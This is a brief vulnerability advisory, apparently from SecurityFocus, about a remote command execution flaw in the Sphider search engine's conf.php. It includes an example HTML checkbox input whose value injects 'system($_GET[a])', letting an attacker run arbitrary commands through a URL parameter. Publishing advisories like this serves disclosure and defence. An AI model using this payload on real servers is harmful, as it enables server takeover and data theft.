Sphider 'conf.php' Remote Command Execution Vulnerability

An attacker can exploit this issue via a browser.

The following example input is available:

<input name="_index_pdf" type="checkbox" value="0; system($_GET[a])" id="index_pdf" >


 

Privacy Statement
Copyright 2010, SecurityFocus